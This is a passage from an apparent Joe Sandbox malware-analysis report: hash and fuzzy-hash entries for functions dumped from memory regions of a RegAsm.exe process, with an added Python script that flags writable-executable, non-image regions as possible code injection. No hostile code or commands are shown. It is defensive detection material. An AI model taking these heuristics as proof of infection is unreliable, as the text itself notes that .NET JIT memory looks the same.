                                                          • Instruction Fuzzy Hash: 9BA10135B05245CFCB14CB68D8985A9BFB1FF85304B1582AAE616CB292DF30EC47CB80

                                                          Control-flow Graph

                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2298071453.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_4f40000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6302b0ed772d1789fbdb143144db6a4e9941d9e44a83a085ee46f4be102e8ef1
                                                          • Instruction ID: ff767d4ca59445471d2842b295bced6b773f836e6787514b5ef3800e79c68d1b
                                                          • Opcode Fuzzy Hash: 6302b0ed772d1789fbdb143144db6a4e9941d9e44a83a085ee46f4be102e8ef1
                                                          • Instruction Fuzzy Hash: AAB18D36B05600DFC720AB24C55462ABBA2EBC6310F15896ED16F9B785DF34FC86CB45
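The memory-dump names above carry the facts an analyst wants first: which process the code was lifted from, the region base, its page protection and its memory type, plus the report's "based on PE: false" flag. The following is an added example, not code from the Joe Sandbox report, that decodes those names into a region triage verdict. The field layout of the .sdmp name (pid.stage.dumpid.base.protect.field5.type.field7) is an assumption read off the names printed in this report; only the fields that can be cross-checked against the snapshot-file name (process 9, stage 2, base 0x4f40000) and the winnt.h constants are interpreted, the others are left undecoded.

```python
"""Triage Joe Sandbox memory-dump (.sdmp) names into a region verdict.

Added example; not part of the Joe Sandbox report.  The .sdmp field layout
below is an ASSUMPTION inferred from the names printed in the report:
  <pid>.<stage>.<dumpid>.<base>.<protect>.<field5>.<type>.<field7>.sdmp
Only pid, stage, base, protect and type are interpreted; field5/field7 are kept raw.
"""
import re

# Windows memory constants from winnt.h (exact values).
PAGE_NOACCESS, PAGE_READONLY, PAGE_READWRITE, PAGE_WRITECOPY = 0x01, 0x02, 0x04, 0x08
PAGE_EXECUTE, PAGE_EXECUTE_READ = 0x10, 0x20
PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY = 0x40, 0x80
MEM_PRIVATE, MEM_MAPPED, MEM_IMAGE = 0x20000, 0x40000, 0x1000000

PROTECT_NAMES = {
    PAGE_NOACCESS: "PAGE_NOACCESS", PAGE_READONLY: "PAGE_READONLY",
    PAGE_READWRITE: "PAGE_READWRITE", PAGE_WRITECOPY: "PAGE_WRITECOPY",
    PAGE_EXECUTE: "PAGE_EXECUTE", PAGE_EXECUTE_READ: "PAGE_EXECUTE_READ",
    PAGE_EXECUTE_READWRITE: "PAGE_EXECUTE_READWRITE",
    PAGE_EXECUTE_WRITECOPY: "PAGE_EXECUTE_WRITECOPY",
}
TYPE_NAMES = {MEM_PRIVATE: "MEM_PRIVATE", MEM_MAPPED: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}
EXECUTABLE = {PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY}
WRITABLE = {PAGE_READWRITE, PAGE_WRITECOPY, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY}

HEX8 = r"[0-9A-Fa-f]{8}"
SDMP_RE = re.compile(
    rf"^(?P<pid>\d{{8}})\.(?P<stage>\d{{8}})\.(?P<dumpid>\d+)\."
    rf"(?P<base>[0-9A-Fa-f]{{16}})\.(?P<protect>{HEX8})\.(?P<field5>{HEX8})\."
    rf"(?P<type>{HEX8})\.(?P<field7>{HEX8})\.sdmp$"
)


def parse_sdmp_name(name: str) -> dict:
    """Split an .sdmp file name into its fields; raises ValueError on a non-matching name."""
    m = SDMP_RE.match(name.rsplit("/", 1)[-1])
    if not m:
        raise ValueError(f"not a Joe Sandbox .sdmp name: {name}")
    protect = int(m["protect"], 16)
    return {
        "pid": int(m["pid"], 10),        # process index as used in the report's process tree
        "stage": int(m["stage"], 10),    # dump stage number (assumed meaning of field 2)
        "dumpid": int(m["dumpid"], 10),
        "base": int(m["base"], 16),
        "protect_raw": protect,
        # low byte only: strips PAGE_GUARD / PAGE_NOCACHE / PAGE_WRITECOMBINE modifier bits
        "protect": PROTECT_NAMES.get(protect & 0xFF, f"0x{protect & 0xFF:x}"),
        "type": TYPE_NAMES.get(int(m["type"], 16), m["type"]),
        "field5": m["field5"], "field7": m["field7"],   # undecoded, kept for reference
    }


def triage_region(name: str, based_on_pe: bool) -> dict:
    """Classify a dumped region; based_on_pe mirrors the report's 'based on PE' flag."""
    info = parse_sdmp_name(name)
    p = info["protect_raw"] & 0xFF
    info["executable"] = p in EXECUTABLE
    info["writable_executable"] = p in WRITABLE and p in EXECUTABLE
    info["based_on_pe"] = based_on_pe
    reasons = []
    if info["writable_executable"]:
        reasons.append("RWX region")
    if info["executable"] and info["type"] == "MEM_PRIVATE":
        reasons.append("executable private (non-image) memory")
    if info["executable"] and not based_on_pe:
        reasons.append("executable region with no PE header")
    info["reasons"] = reasons
    info["suspicious"] = bool(reasons)
    return info


# Constructed input: the two dump names this report's functions were lifted from,
# with the 'based on PE' flag the report prints for each.
REPORT_DUMPS = [
    ("00000009.00000002.2298071453.0000000004F40000.00000040.00000800.00020000.00000000.sdmp", False),
    ("00000009.00000002.2295165796.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp", False),
]


def triage_report_dumps(dumps=REPORT_DUMPS) -> list:
    """Run the triage over every (name, based_on_pe) pair."""
    return [triage_region(n, pe) for n, pe in dumps]


if __name__ == "__main__":
    for r in triage_report_dumps():
        print(f"pid {r['pid']} base 0x{r['base']:08X} {r['protect']} {r['type']} -> "
              f"{'SUSPICIOUS' if r['suspicious'] else 'ok'}: {', '.join(r['reasons'])}")
```

Both regions in this report come out as RWX, MEM_PRIVATE and not PE-backed, which is the profile of code written into a process rather than loaded from an image. One caveat before treating that as a verdict: RegAsm.exe is a .NET host, and the CLR's JIT also emits native code into private executable memory, so the flag is a lead to correlate with the injection and process-creation signatures in the report rather than proof of injection on its own.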

Control-flow Graph (the executed / not-executed colouring exists only in the interactive viewer; the raw node/edge list is not reproduced here): the same function body as the graph above, entered at 0x4f40220 and spanning 0x4f40220 to 0x4f40656, with the same fan-out blocks 0x4f4029f, 0x4f4030c and 0x4f402c0 and the same sink block 0x4f4064e-0x4f40656.
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2298071453.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_4f40000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6f9395efc8c5264bcf3db3d527ebb921834d998f4688ea4dde449dd91faa8151
                                                          • Instruction ID: 395c43c5fcd0fccf603f68ad9e0f85e1a83a34819640a5481c4a8f8c9a187d20
                                                          • Opcode Fuzzy Hash: 6f9395efc8c5264bcf3db3d527ebb921834d998f4688ea4dde449dd91faa8151
                                                          • Instruction Fuzzy Hash: 01A17D36B04600DFC724AB24C55462ABBA2EBC6310F14896ED26F5BB85DF34FC86CB45
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2298071453.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_4f40000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7bbaeb7bf57013ea5441b18c868eeb91c885138d48f6eaf5c817056a02cc82c7
                                                          • Instruction ID: 56404af504298bd6755292e037cce5bc4bc920a772e4b8058398eac9c3730df6
                                                          • Opcode Fuzzy Hash: 7bbaeb7bf57013ea5441b18c868eeb91c885138d48f6eaf5c817056a02cc82c7
                                                          • Instruction Fuzzy Hash: D23155707006059FDB08DF29DC84E6EB7B5EFC8724F208659E6299B3A1DB30AC428B51
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295165796.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_d1d000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 74b06d73c12c121434cb47db4310812ae26e13e4dc84586607b02ddad330bdde
                                                          • Instruction ID: f7eaf06536597824fa4ea72cf6bdeb47d1a40272370ac88efcb4a8a1514aa4f6
                                                          • Opcode Fuzzy Hash: 74b06d73c12c121434cb47db4310812ae26e13e4dc84586607b02ddad330bdde
                                                          • Instruction Fuzzy Hash: 5021F271604244FFDB05DF24E9C0B66BBA2FB84318F34C66DD9494B242CB3AD886CA75
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295165796.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_d1d000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ba4cdf2073e1ef037e2115ae8c66ff59603697fa0c926e829ed50a949711ba32
                                                          • Instruction ID: 4fcf7bb2b66ec923a80120056ad81ff32606cc9011ed1aa0aa59f03f2893fbb3
                                                          • Opcode Fuzzy Hash: ba4cdf2073e1ef037e2115ae8c66ff59603697fa0c926e829ed50a949711ba32
                                                          • Instruction Fuzzy Hash: 4A21F275604244FFDB14DF24E9C0B66BB62EB88314F24C56DE9494B246CB3AD887CA72
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295165796.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_d1d000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 115f41afa825531bba72919bb761bab228fde119b1890eaad57cc23d002355f4
                                                          • Instruction ID: 72f31b5798e24ab8eb17f8a1ced9c4a6befd5ed2cf7144af498ae874df72ca3e
                                                          • Opcode Fuzzy Hash: 115f41afa825531bba72919bb761bab228fde119b1890eaad57cc23d002355f4
                                                          • Instruction Fuzzy Hash: 3F2192755093C09FCB02CF24D990715BF71EB46314F28C5EAD8498F6A7C33A984ACB62
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2298071453.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_4f40000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d83bd03bf77b405a790c2d18997d94b96ccc83f7e105aaef59aae12a6fce7916
                                                          • Instruction ID: 1339105b5786c24ba72c288d58868bb4b3e3d1deb2358d9c2513a525c8546738
                                                          • Opcode Fuzzy Hash: d83bd03bf77b405a790c2d18997d94b96ccc83f7e105aaef59aae12a6fce7916
                                                          • Instruction Fuzzy Hash: EA11C635A08300AFD7406BB49D1D7EE7FB5EB44310F1440AAE50ACB3C1EF3809068BA1
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295165796.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_d1d000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ac9c5df3739d9922357d97ee08fe41b46f5237faea4d682c3f3ac9d5e7d34632
                                                          • Instruction ID: 74191023dd599386302fd4721bb770dc5a523dc55fbcd68f09200469421ca797
                                                          • Opcode Fuzzy Hash: ac9c5df3739d9922357d97ee08fe41b46f5237faea4d682c3f3ac9d5e7d34632
                                                          • Instruction Fuzzy Hash: 2F119D75904284EFCB15CF14D5C4B55FFA2FB84314F28C6ADD8494B656C33AD88ACB62
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2298071453.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_4f40000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 96cbb814f5801453d54382d3a1e5566ee63dd276b5ce0730ec88cd91f4350117
                                                          • Instruction ID: a85defad2cb5abcbbf92142d3dee95b4b5a265582d9f6c7e6c4237947a2b01de
                                                          • Opcode Fuzzy Hash: 96cbb814f5801453d54382d3a1e5566ee63dd276b5ce0730ec88cd91f4350117
                                                          • Instruction Fuzzy Hash: 0601225A71C3914FCB12063A18612BA3FB58FC3304B0901ABCD42CB282EE29CD1783A1
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2298071453.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_4f40000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7fc0dd070a9f97a66eb7e2c4f237e56d1299f373705aec2fa25fd82c7933cd54
                                                          • Instruction ID: be7fb834e63f6c29ece9a64eea92fa0fbd6371a1694441a8fbf1d3b33a141a85
                                                          • Opcode Fuzzy Hash: 7fc0dd070a9f97a66eb7e2c4f237e56d1299f373705aec2fa25fd82c7933cd54
                                                          • Instruction Fuzzy Hash: 1E012134A04214AFD744ABB89E197AE7AA5EB44710F10406AE60ADA780DF7419018BA2
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2298071453.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_4f40000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2fe2d216f492f0fb34ea66a3c64a861efa5ce171d4bc33e5c47a5d117b1cfee1
                                                          • Instruction ID: d9a54d3e8d82c9e937b81fe39c1d06638c1a0fa0d59d2e107cdf88d4cd0cc805
                                                          • Opcode Fuzzy Hash: 2fe2d216f492f0fb34ea66a3c64a861efa5ce171d4bc33e5c47a5d117b1cfee1
                                                          • Instruction Fuzzy Hash: ABE0DF267282125B4F20117F291003B7EEE8FD5740708042B9F06D7384FEB9ED2342A0
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2298071453.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_4f40000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cb94d203f9c316a7b6e1b430a6fff58729a3f468c2c84af714c7f038783eea4d
                                                          • Instruction ID: 087d26a645b0666d92d5fc27f2002c46561b1ad09a3a3de81be7aee699bab702
                                                          • Opcode Fuzzy Hash: cb94d203f9c316a7b6e1b430a6fff58729a3f468c2c84af714c7f038783eea4d
                                                          • Instruction Fuzzy Hash: 56F0392964D3908FC3168B2098A5F567F72AB83304B1BC0EBD5858F1E3CA699C0EDB11
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2298071453.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_4f40000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 95188ed13c7ddb57dfd9af9ffb95ec864291278869c0119ac792d8be9d330775
                                                          • Instruction ID: 447cb5ba43727bc6cd111cc5d088e471a6207ff845be61710f57d93d50123498
                                                          • Opcode Fuzzy Hash: 95188ed13c7ddb57dfd9af9ffb95ec864291278869c0119ac792d8be9d330775
                                                          • Instruction Fuzzy Hash: 95D05B39700525CBCF047BF8662D26C7F62DB84711B144069E907DB781DF2C09134F96
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2298071453.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_4f40000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1f7008135b41fe99f7a4bbd9472d947bdb466478f4e325662c73ad6793daffc3
                                                          • Instruction ID: 58088eb139a07d611a37ac687c8bf8ce15a76dee1f20da28745c8bc292e5ef3b
                                                          • Opcode Fuzzy Hash: 1f7008135b41fe99f7a4bbd9472d947bdb466478f4e325662c73ad6793daffc3
                                                          • Instruction Fuzzy Hash: 9ED0A738B003048FC318D714D945F16BB97E780704F01C4A5E6044F2D6CE31EC05CB44